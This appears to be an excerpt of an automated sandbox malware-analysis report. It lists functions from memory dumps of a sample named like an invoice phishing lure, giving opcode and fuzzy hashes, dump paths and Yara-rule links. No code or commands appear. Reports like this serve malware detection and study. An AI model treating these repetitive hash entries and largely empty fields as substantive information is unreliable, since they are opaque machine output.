                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                            • Instruction ID: 76b7b4a3bdec600b486d17adc31fbe9e639678fd8716cfb4ea06fb82d7000f34
                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                            • Instruction Fuzzy Hash: AFD0A932204A64ABDBB2AA2CFC00FC333E8BB88720F060499B048CB051C360AC81CA84
                                            Function 010FE908 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                            • Instruction ID: d724d9fffd761ed11c3e9d9ef0538d556944bef641c12b00e4558159d1b0089f
                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                            • Instruction Fuzzy Hash: 2CE0EC75954684AFDF52EF59C640F9EBBF9BB95B40F150058A2885B670C624A900CB50
                                            Function 0040E470 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f395d3bb3d09b632d29854c1c82e38744bdc7aced40cc42b920e8f8754f3e910
                                            • Instruction ID: eb004a2698d82f3325453bf8f13daccd177309bced67ce9b3fc8aaf5a8d98dde
                                            • Opcode Fuzzy Hash: f395d3bb3d09b632d29854c1c82e38744bdc7aced40cc42b920e8f8754f3e910
                                            • Instruction Fuzzy Hash: ABD01233E101118BC7119E45A440074F370F68A13775021F7EA0AB7081D232D551CACE
                                            Function 0107A0E3 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                            • Instruction ID: 490a79f71bb84d1c0a54657ea538ddd5b4d642561c3c027ab697eb8b82800c0d
                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                            • Instruction Fuzzy Hash: 91D02232713070D7DF2956656810FAB6905AB80A90F0E006C340AD3800C0048C83D6E0
                                            Function 010BA830 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                            • Instruction ID: 5c4ba68155f7b1a398a405a496c873d9d9e786e28e8585071ed07b3262730832
                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                            • Instruction Fuzzy Hash: 24D012771D054DBBCB119F66DC01F957BA9E764BA0F444020B508CB5A0C63AE950DA84
                                            Function 010BCA24 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cac98828292792e482f98f0bc37f585558dc58825c7c87b23cf95958ae23485e
                                            • Instruction ID: 4e26c49ad70f26764f883365c69a60898a599845d3284b074dd3b3409fb3be92
                                            • Opcode Fuzzy Hash: cac98828292792e482f98f0bc37f585558dc58825c7c87b23cf95958ae23485e
                                            • Instruction Fuzzy Hash: B0D0A930601886CBEF2BCF18CA65EEE3AB0FB50640B8000BCE78092920E329EC41CB00
                                            Function 010BC700 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                            • Instruction ID: a1985ea5c0d57be430d91f5139e41928eb4648fe1ca8925920bfff9398589c5e
                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                            • Instruction Fuzzy Hash: FAC01232150648AFC7119A95CD01F4177A9E798B40F000021F2048B570C531E810EA44
                                            Function 010A0310 Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                            • Instruction ID: 16dd6114044ad26a714ad8234e7409a4cfa9bbbca9be4388123f7b875a13565e
                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                            • Instruction Fuzzy Hash: 2ED0123710024CEFCB01DF81C890D9A772AFBD8710F508019FD190B610CA31ED62DA50
                                            Function 01080750 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction ID: 1ea1778e9b96d20009e40dfcb960291ce7e0b7502d600522673fa3cd392739f3
                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction Fuzzy Hash: 43C04C75701A458FCF15DB29D2A4F4577E4F744740F1518D0E945CF721E624E801DA10
                                            Function 010C4340 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
                                            • Instruction ID: ed5a516fa6b38b7f2f1d80e13d65822a27558f884b6d789d2e74400fe52d2c97
                                            • Opcode Fuzzy Hash: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
                                            • Instruction Fuzzy Hash: 8690023560591012A140715C88845464015A7E0301B55C012E0824554CCA148A565362
                                            Function 010C4650 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
                                            • Instruction ID: b50b7bbfca148bafb12487d1d1b6c65ebec9e1a8ee3b04032b9aafd3d8ad8af1
                                            • Opcode Fuzzy Hash: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
                                            • Instruction Fuzzy Hash: 45900265601610425140715C88044066015A7E1301395C116E0954560CC6188955936A
                                            Function 010C2B80 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa736e05d71b532488073c1d8e7eb637f40b800e98f0c9c4519815564e54a9f8
                                            • Instruction ID: ac004e06c9c71e36a80ae1afa386c36438b5bf6d980b0c3168367c7900d40e11
                                            • Opcode Fuzzy Hash: aa736e05d71b532488073c1d8e7eb637f40b800e98f0c9c4519815564e54a9f8
                                            • Instruction Fuzzy Hash: 3490023520151802E104715C8804686001597D0301F55C012E6424655ED66589917232
                                            Function 010C2BA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd091f055c858667016e2a0a40fc1f957963f2f33b6de58c29eb285ba98b1b4a
                                            • Instruction ID: 66baa0988b91f88bae7567c4a065ba0ca8ace8b7a238814669fc1d18d5efbc5a
                                            • Opcode Fuzzy Hash: bd091f055c858667016e2a0a40fc1f957963f2f33b6de58c29eb285ba98b1b4a
                                            • Instruction Fuzzy Hash: 1390023560551802E150715C8414746001597D0301F55C012E0424654DC7558B5577A2
                                            Function 010C2BE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b42778062a81e522a321209be3c14306084f86a0049105c92e2f13f290d0fef4
                                            • Instruction ID: 7b6de717d04d578439c8de3000176107b49d1e69da826d01f98aa7a10c0c4ff8
                                            • Opcode Fuzzy Hash: b42778062a81e522a321209be3c14306084f86a0049105c92e2f13f290d0fef4
                                            • Instruction Fuzzy Hash: BB90023520555842E140715C8404A46002597D0305F55C012E0464694DD6258E55B762
                                            Function 010C2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 482c097b452e64ef4ef878ff03e8b4a3f6e8a88e2094564eafb24fa1f250745a
                                            • Instruction ID: 5df8430bafc2a96321f66e6d40a622b5b92e571b16583fdc0f3f62be33814369
                                            • Opcode Fuzzy Hash: 482c097b452e64ef4ef878ff03e8b4a3f6e8a88e2094564eafb24fa1f250745a
                                            • Instruction Fuzzy Hash: F89002A5201650925500B25CC404B0A451597E0201B55C017E1454560CC52589519236
                                            Function 010C2AF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
                                            • Instruction ID: 43ab85abedfba76fa2b69735bdd00e5012b9d28fe89aea4a6aa6fab7ab34c2c3
                                            • Opcode Fuzzy Hash: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
                                            • Instruction Fuzzy Hash: B2900229221510021145B55C460450B0455A7D6351395C016F1816590CC62189655322
                                            Function 010C2D00 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
                                            • Instruction ID: 78d799a7d9ba078d425175d8babcbec8f55bf7b33ef422a9d57828c073fb2ea6
                                            • Opcode Fuzzy Hash: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
                                            • Instruction Fuzzy Hash: B490022520555442E100755C9408A06001597D0205F55D012E1464595DC6358951A232
                                            Function 010C2DB0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                            • Instruction ID: 222808043593ebb094aed55aed3c12b5475ba93cf97c51aeb7b8e640e2095d30
                                            • Opcode Fuzzy Hash: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                            • Instruction Fuzzy Hash: 5490023524151402E141715C84046060019A7D0241F95C013E0824554EC6558B56AB62
                                            Function 010C2C60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                            • Instruction ID: 28de6fa8172aaebe58d266d7ae12fb865f6b674d50dddbd06ccadf8cb1d59fba
                                            • Opcode Fuzzy Hash: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                            • Instruction Fuzzy Hash: 0790023520151842E100715C8404B46001597E0301F55C017E0524654DC615C9517622
                                            Function 010C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                            • Instruction ID: 28d2a9a8d34ba67b946ae3d78dbaeda62468b16f615ce5fd5bf5f0127c4643f8
                                            • Opcode Fuzzy Hash: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                            • Instruction Fuzzy Hash: 8990022560551402E140715C9418706002597D0201F55D012E0424554DC6598B5567A2
                                            Function 010C2CF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                            • Instruction ID: 2c0da6c6c4ba95a3ff2d16b361e3a7cc1502462fcca474ee28911a75cc220433
                                            • Opcode Fuzzy Hash: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                            • Instruction Fuzzy Hash: 6C90023520151403E100715C9508707001597D0201F55D412E0824558DD65689516222
                                            Function 010C2F60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                            • Instruction ID: 552f532c1675269c3b3b5824642c33acef3bd1e139ee3a15d1006b619f1bd633
                                            • Opcode Fuzzy Hash: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                            • Instruction Fuzzy Hash: ED90047531151043F104715CC4047070055D7F1301F55C013F3554554CC53DCD715337
                                            Function 010C2FA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                            • Instruction ID: 15ccf085ea955a9f8cf04d686fd7131f5c102fe7d2daacf0ffed59c704dd16b3
                                            • Opcode Fuzzy Hash: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                            • Instruction Fuzzy Hash: B790023520191402E100715C8808747001597D0302F55C012E5564555EC665C9916632
                                            Function 010C2E30 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                            • Instruction ID: 59a296c1882d376c5ffca640d23a70516df835ee6199f4ea7046ba19122cb285
                                            • Opcode Fuzzy Hash: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                            • Instruction Fuzzy Hash: B990022530151402E102715C84146060019D7D1345F95C013E1824555DC6258A53A233
                                            Function 010C2EE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
                                            • Instruction ID: 48d62672ad2af1dd8117a263e1245aef0e18e92ea8fc19626cffa350247d4461
                                            • Opcode Fuzzy Hash: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
                                            • Instruction Fuzzy Hash: FC90026520191403E140755C8804607001597D0302F55C012E2464555ECA298D516236
                                            Function 010C3010 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c367a7a73f32f3a19ccd78391ec176f60a144906f8683c509720baef597335f6
                                            • Instruction ID: 013d9097e31262e8d932d5a6bf1782e161c0641e20f9ee7ef48a890494d0f334
                                            • Opcode Fuzzy Hash: c367a7a73f32f3a19ccd78391ec176f60a144906f8683c509720baef597335f6
                                            • Instruction Fuzzy Hash: 6490022520195442E140725C8804B0F411597E1202F95C01AE4556554CC91589555722
                                            Function 010C3090 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
                                            • Instruction ID: cfaaafe9771839168c619591c60e100dd126ffec722574b78cbdf098f969b0bd
                                            • Opcode Fuzzy Hash: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
                                            • Instruction Fuzzy Hash: 9590022524151802E140715CC4147070016D7D0601F55C012E0424554DC6168A6567B2
                                            Function 010C35C0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                            • Instruction ID: 510a34855ed59ad2da894fcede28a886b3038c54b0ce0beeaaf4a74f38f17945
                                            • Opcode Fuzzy Hash: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                            • Instruction Fuzzy Hash: 7290023560561402E100715C8514706101597D0201F65C412E0824568DC7958A5166A3
                                            Function 010C39B0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
                                            • Instruction ID: f4dcbe2f876b82df825029d6e11a5b883b781860671f80d9dd05dfc58195520b
                                            • Opcode Fuzzy Hash: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
                                            • Instruction Fuzzy Hash: DC90022524556102E150715C84046164015B7E0201F55C022E0C14594DC55589556322
                                            Function 010C3D10 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
                                            • Instruction ID: f6021ed495f5f2aa8f8e08767c6e668882adaf536544cb56668249e49d0b7ef2
                                            • Opcode Fuzzy Hash: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
                                            • Instruction Fuzzy Hash: 2890023520251142A540725C9804A4E411597E1302B95D416E0415554CC91489615322
                                            Function 010C3D70 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
                                            • Instruction ID: e7d6ee4cf95f8375d5b0b8343d4699337ff36a6468ed4792a5af16eb92146ff6
                                            • Opcode Fuzzy Hash: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
                                            • Instruction Fuzzy Hash: E890023920151402E510715C9804646005697D0301F55D412E0824558DC65489A1A222
                                            Function 010C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 8180b858bc80128465cbe62474224157435153773c8158baaad54eb40a782727
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Function 010C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                            • Instruction ID: 08e0d7b6c9eb29df1883b52f33894d38ec03fe4c886f20b7996825ad07aedf8d
